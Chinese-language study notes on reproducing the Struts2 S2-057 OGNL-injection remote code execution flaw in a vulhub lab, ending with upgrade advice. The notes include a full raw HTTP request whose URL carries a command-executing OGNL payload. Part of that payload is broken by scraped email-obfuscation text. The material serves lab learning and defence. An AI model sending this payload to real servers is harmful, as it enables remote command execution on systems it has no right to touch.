vulhub学习笔记-struts2 S2-057 Remote Code Execution Vulnerablity远程代码执行

Struts2 S2-057 Remote Code Execution Vulnerablity远程代码执行

一.漏洞介绍
(一)编号
S2-057
(二)概述
S2-057漏洞产生于网站配置xml的时候,有一个namespace的值,该值并没有做详细的安全过滤导致可以写入到xml上,尤其url标签值也没有做通配符的过滤,导致可以执行远程代码以及系统命令到服务器系统中去
(三)影响版本
Apache Struts 2.3 – Struts 2.3.34
Apache Struts 2.5 – Struts 2.5.16
(四)适用条件
-alwaysSelectFullNamespace为true。
-action元素没有设置namespace属性,或者使用了通配符。
命名空间将由用户从uri传递并解析为OGNL表达式,最终导致远程代码执行漏洞。

二.操作步骤
(一)Vulhub ip地址:http://192.168.126.136
文件位于:/home/vulhub/vulhub-master/struts/S2-057
1.环境搭建 docker-compose build和docker-compose up -d
2.检查docker是否开启 docker-compose ps
vulhub学习笔记-struts2 S2-057 Remote Code Execution Vulnerablity远程代码执行_第1张图片

(二)Windows
1.登录struts测试页面 http://192.168.126.136:8080/struts2-showcase
vulhub学习笔记-struts2 S2-057 Remote Code Execution Vulnerablity远程代码执行_第2张图片

2.开启拦截抓包,点击view
vulhub学习笔记-struts2 S2-057 Remote Code Execution Vulnerablity远程代码执行_第3张图片

3.发送到重发器,并修改get位置,再点go
vulhub学习笔记-struts2 S2-057 Remote Code Execution Vulnerablity远程代码执行_第4张图片

Go得到下图所示结果,说明存在漏洞。可以看到,200*200的结果已经在Location头中返回。

4.修改数据包 数据包内容为

GET /struts2-showcase**/$%7B%0A%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%[email protected]@getRuntime%28%29.exec%28%27id%27%29%29.%[email protected]@toString%28%23a.getInputStream%28%29%29%29%7D/**actionChain1.action HTTP/1.1
Host: xx.xx.xx.xx:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: pma_lang=zh_CN; PHPSESSID=ktl19cua6l8te70hdre5vti097; security=low; JSESSIONID=8A451123FAEEC6210EA07D642B8D4778
Connection: close

/struts2-showcase*/$%7B%0A%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%[email protected]@getRuntime%28%29.exec%28%27id%27%29%29.%[email protected]@toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action HTTP/1.1*

斜体为构造函数,粗体为执行命令
成功执行操作

三.漏洞防护
(一)尽快升级到Apache Struts 2.3.35 或 Struts 2.5.17版

参考文章 https://blog.csdn.net/lhh134/article/details/87368699
https://cloud.tencent.com/developer/article/1511916
https://www.jianshu.com/p/6db98793d043
https://blog.csdn.net/Z_Grant/article/details/101213506

你可能感兴趣的:(vulhub,安全漏洞)